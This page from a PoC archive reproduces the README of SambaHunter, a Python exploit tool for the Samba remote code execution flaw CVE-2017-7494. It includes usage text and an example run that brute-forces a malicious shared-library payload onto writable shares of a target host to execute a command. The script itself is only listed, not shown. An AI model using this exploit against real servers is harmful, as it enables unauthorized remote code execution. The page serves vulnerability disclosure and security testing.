Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-7494 PoC — Samba 安全漏洞

Source
https://github.com/brianwrf/SambaHunter
Associated Vulnerability
Title:Samba 安全漏洞 (CVE-2017-7494)
Description:Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
Description
It is a simple script to exploit RCE for Samba (CVE-2017-7494 ).
Readme
# SambaHunter
It is a simple script to exploit RCE for Samba (CVE-2017-7494).

Now works with Python3. Many of the required Python2 libraries are deprecated (e.g. `commands`)

Added logging to show which shares are writeable. If 'Exploit Finished' appears but no shares are writeable, the exploit didn't work.

# Requirements
* sudo apt-get install smbclient
* pip install pysmbclient

# Usage
```
# python3 sambahunter.py -h


  ____                  _           _   _             _            
 / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ 
 \___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   
 |____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|   
                                                                   
    # Exploit Author: avfisher (https://github.com/brianwrf)
    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
    # CVE-2017-7494
    # Help: python sambahunter.py -h

usage: sambahunter.py [-h] [-s SERVER] [-c COMMAND]

optional arguments:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        Server to target
  -c COMMAND, --command COMMAND
                        Command to execute on target server
 ```
 
 # Example
 ```
 # python3 sambahunter.py -s 192.168.1.106 -c 'uname -a > /tmp/u.txt'


  ____                  _           _   _             _            
 / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ 
 \___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   
 |____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|   
                                                                   
    # Exploit Author: avfisher (https://github.com/brianwrf)
    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
    # CVE-2017-7494
    # Help: python sambahunter.py -h

[*] Exploiting RCE for Samba (CVE-2017-7494 )...
[*] Server: 192.168.1.106
[*] Samba version: Samba 4.3.8-Ubuntu
[*] Generate payload succeed: /root/samba_14506.so
[+] Brute force exploit: /volume1/samba_14506.so
[+] Brute force exploit: /volume2/samba_14506.so
[+] Brute force exploit: /volume3/samba_14506.so
[+] Brute force exploit: /shared/samba_14506.so
[+] Brute force exploit: /mnt/samba_14506.so
[+] Brute force exploit: /mnt/usb/samba_14506.so
[+] Brute force exploit: /media/samba_14506.so
[+] Brute force exploit: /mnt/media/samba_14506.so
[+] Brute force exploit: /var/samba/samba_14506.so
[+] Brute force exploit: /tmp/samba_14506.so
[+] Brute force exploit: /home/samba_14506.so
[+] Brute force exploit: /home/shared/samba_14506.so
[*] Exploit finished!
 ```
![](https://raw.githubusercontent.com/brianwrf/SambaHunter/master/example.jpeg)
File Snapshot

 [4.0K]  /data/pocs/c96df5c3b2be3fb1fb78732fc2f9f6e97ad07c9e
├── [547K]  example.jpeg
├── [2.8K]  README.md
└── [5.2K]  sambahunter.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →